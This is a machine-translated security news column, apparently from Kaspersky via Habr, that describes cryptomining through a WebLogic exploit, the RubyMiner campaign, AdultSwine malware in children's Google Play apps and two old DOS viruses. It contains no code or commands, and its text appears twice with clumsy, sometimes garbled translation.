Security Week 1: Witnesses do not steal, old deep exploits, Google Play against swinishness
News in Russian . More in English
Oracle’s popular products have fallen victim to a recently published exploit that allows remote execution of arbitrary code — to the experts’s surprise, however, nothing worse than unauthorized mining of cryptocurrency has happened to them. The attackers exploited a vulnerability in WebLogic application servers patched by Oracle last October.
To use the exploit, publicly described a little more than a month ago, does not require special skills. Not surprisingly, the malicious campaign quickly gained momentum. Not only WebLogic servers themselves, but also other Oracle solutions that use them came under the distribution. This includes PeopleSoft - an ERP system for managing a complex administrative infrastructure and financial flows of a large enterprise (often organizations keep all their data in this system, confidential and not so much).
It would seem that no one could come up with more appetizing targets: companies large enough to use expensive Oracle products, and careless enough not to install updates available from autumn - steal insider secrets, blackmail, wait for a response tone! At least it was quite possible to count on a data leakage scandal. But no, the criminals decided that selling information on the black market they are not in the mood for today and generally have a headache, but to mine cryptocurrency at current prices is much more profitable.
Anyway, while the attackers managed to get rid of at least 611 Monero tokens - approximately $ 226 thousand: so much is stored in the wallet that they managed to access when analyzing the XMRig configuration file that came to the researchers. How many such purses, science, as usual, is not known.
')
News
As we often have to remind you, many malicious programs use exploits for already closed vulnerabilities. The calculation is obvious: not everyone will know about the updates, not all of them will be immediately installed, which means that the attackers will have time to profit if they act quickly.
But the criminals behind the new RubyMiner are in no hurry. They are sightedly searching for systems that are not updated for several years - both Windows and Linux - and use the arsenal of old, well-known and long-patched mining vulnerabilities for Monero using the so-called RubyMiner.
After analyzing the malware for the Linux server, the researchers reported that it deletes all cron tasks and assigns its own task, which once a hour downloads the script hidden from the Internet in the robots.txt files on different domains. And already this script, in turn, loads the good old XMRig.
Of course, most cars over ten years old can’t indulge in performance with modern ones, and therefore minyat aren’t particularly successful, but there’s little or no attention to them - which means that it’s more likely that unauthorized prospectors will remain undetected longer. As the study of one wallet has shown, hackers have already dropped at least $ 540. It seems to be a little bit, but there are practically no costs: the domain from which the malicious script is loaded has already been used in at least one attack in 2013, and with the same exploit through which RubyMiner spreads. Apparently, the attackers literally scratched the bottom of the barrel and blinded the attack from what it was.
News
In December, more than 60 malicious applications were removed from the Google Play store, mostly games that leaked through numerous checks. The developers were banned, and the users who downloaded them continue to display warnings of potential danger. Worn applications used the usual set of tactics - they threw out a warning about the virus on the whole screen, then they offered to download "antivirus" (of course, fake), offered users to participate in lotteries, signed them to paid services ... In general, the usual gentleman's set. The case as a whole would be quite ordinary, if not for one "but."
Specifically, this pack of garbage was distinguished by the fact that, firstly, many programs were uniquely designed for preschoolers: names from cartoons, puppies and other attributes of a tender age. And secondly, applications sometimes began to show children hardcore porn - and on top of all other screens and without warning.
And here the question arises not even about the moral level (with him and so everything is clear), but about the adequacy of intruders. The fact is that the choice of which methods to pull money or information from a user was made after the malware was downloaded. The application has a built-in malware component called AdultSwine researchers. "Pig" was registered on the server of developers, sent data about the user and waited instructions on what exactly to tempt or intimidate the new victim.
The decision to show content to the four-year-olds 18+ gives an obvious misunderstanding by the attackers of the target audience: the kids are unlikely to click on the pornobanner, they are more likely to be frightened and will call adults. Although it may be a banal error in the profiling algorithms.
Be that as it may, Google representatives stressed that, starting from the end of January, new protective functions will be introduced on Google Play, which will warn of suspicious applications - however, users themselves need not to lose their vigilance.
Family "Invader" and "Plastique"
Resident very dangerous viruses. They hit .COM- and .EXE files (except COMMAND.COM) according to the algorithm of the Jerusalem virus and Boot sectors of floppy disks and the hard drive. A floppy disk format an additional track, with the defeat of the hard drive recorded immediately after the MBR. Depending on their counters, they can perform a single cycle at each timer interrupt (int 8), erase information on disks, play a melody, decrypt and display texts:
"Invader" - "by Invader, Feng Chia U., Warning: Don't run ACAD.EXE!";
“Plastique” - “PLASTIQUE 5.21 (plastic bomb) Copyright © 1988-1990 by ABT Group (in association with Hammer LAB.) WARNING: DON'T RUN ACAD.EXE!”;
Also contain text: "ACAD.EXECOMMAND.COM.COM.EXE".
Intercepted int 8, 9, 13h, 21h.
Disclaimer: This column reflects only the personal opinion of its author. It may coincide with the position of Kaspersky Lab, or it may not coincide. Then how lucky.
Oracle’s popular products have fallen victim to a recently published exploit that allows remote execution of arbitrary code — to the experts’s surprise, however, nothing worse than unauthorized mining of cryptocurrency has happened to them. The attackers exploited a vulnerability in WebLogic application servers patched by Oracle last October.To use the exploit, publicly described a little more than a month ago, does not require special skills. Not surprisingly, the malicious campaign quickly gained momentum. Not only WebLogic servers themselves, but also other Oracle solutions that use them came under the distribution. This includes PeopleSoft - an ERP system for managing a complex administrative infrastructure and financial flows of a large enterprise (often organizations keep all their data in this system, confidential and not so much).
It would seem that no one could come up with more appetizing targets: companies large enough to use expensive Oracle products, and careless enough not to install updates available from autumn - steal insider secrets, blackmail, wait for a response tone! At least it was quite possible to count on a data leakage scandal. But no, the criminals decided that selling information on the black market they are not in the mood for today and generally have a headache, but to mine cryptocurrency at current prices is much more profitable.
Anyway, while the attackers managed to get rid of at least 611 Monero tokens - approximately $ 226 thousand: so much is stored in the wallet that they managed to access when analyzing the XMRig configuration file that came to the researchers. How many such purses, science, as usual, is not known.
')
Attack of retro lovers
News
As we often have to remind you, many malicious programs use exploits for already closed vulnerabilities. The calculation is obvious: not everyone will know about the updates, not all of them will be immediately installed, which means that the attackers will have time to profit if they act quickly.
But the criminals behind the new RubyMiner are in no hurry. They are sightedly searching for systems that are not updated for several years - both Windows and Linux - and use the arsenal of old, well-known and long-patched mining vulnerabilities for Monero using the so-called RubyMiner.
After analyzing the malware for the Linux server, the researchers reported that it deletes all cron tasks and assigns its own task, which once a hour downloads the script hidden from the Internet in the robots.txt files on different domains. And already this script, in turn, loads the good old XMRig.
Of course, most cars over ten years old can’t indulge in performance with modern ones, and therefore minyat aren’t particularly successful, but there’s little or no attention to them - which means that it’s more likely that unauthorized prospectors will remain undetected longer. As the study of one wallet has shown, hackers have already dropped at least $ 540. It seems to be a little bit, but there are practically no costs: the domain from which the malicious script is loaded has already been used in at least one attack in 2013, and with the same exploit through which RubyMiner spreads. Apparently, the attackers literally scratched the bottom of the barrel and blinded the attack from what it was.
Fighting swinishness
News
In December, more than 60 malicious applications were removed from the Google Play store, mostly games that leaked through numerous checks. The developers were banned, and the users who downloaded them continue to display warnings of potential danger. Worn applications used the usual set of tactics - they threw out a warning about the virus on the whole screen, then they offered to download "antivirus" (of course, fake), offered users to participate in lotteries, signed them to paid services ... In general, the usual gentleman's set. The case as a whole would be quite ordinary, if not for one "but."
Specifically, this pack of garbage was distinguished by the fact that, firstly, many programs were uniquely designed for preschoolers: names from cartoons, puppies and other attributes of a tender age. And secondly, applications sometimes began to show children hardcore porn - and on top of all other screens and without warning.
And here the question arises not even about the moral level (with him and so everything is clear), but about the adequacy of intruders. The fact is that the choice of which methods to pull money or information from a user was made after the malware was downloaded. The application has a built-in malware component called AdultSwine researchers. "Pig" was registered on the server of developers, sent data about the user and waited instructions on what exactly to tempt or intimidate the new victim.
The decision to show content to the four-year-olds 18+ gives an obvious misunderstanding by the attackers of the target audience: the kids are unlikely to click on the pornobanner, they are more likely to be frightened and will call adults. Although it may be a banal error in the profiling algorithms.
Be that as it may, Google representatives stressed that, starting from the end of January, new protective functions will be introduced on Google Play, which will warn of suspicious applications - however, users themselves need not to lose their vigilance.
Antiquities
Family "Invader" and "Plastique"
Resident very dangerous viruses. They hit .COM- and .EXE files (except COMMAND.COM) according to the algorithm of the Jerusalem virus and Boot sectors of floppy disks and the hard drive. A floppy disk format an additional track, with the defeat of the hard drive recorded immediately after the MBR. Depending on their counters, they can perform a single cycle at each timer interrupt (int 8), erase information on disks, play a melody, decrypt and display texts:
"Invader" - "by Invader, Feng Chia U., Warning: Don't run ACAD.EXE!";
“Plastique” - “PLASTIQUE 5.21 (plastic bomb) Copyright © 1988-1990 by ABT Group (in association with Hammer LAB.) WARNING: DON'T RUN ACAD.EXE!”;
Also contain text: "ACAD.EXECOMMAND.COM.COM.EXE".
Intercepted int 8, 9, 13h, 21h.
Disclaimer: This column reflects only the personal opinion of its author. It may coincide with the position of Kaspersky Lab, or it may not coincide. Then how lucky.
Source: https://habr.com/ru/post/347400/
All Articles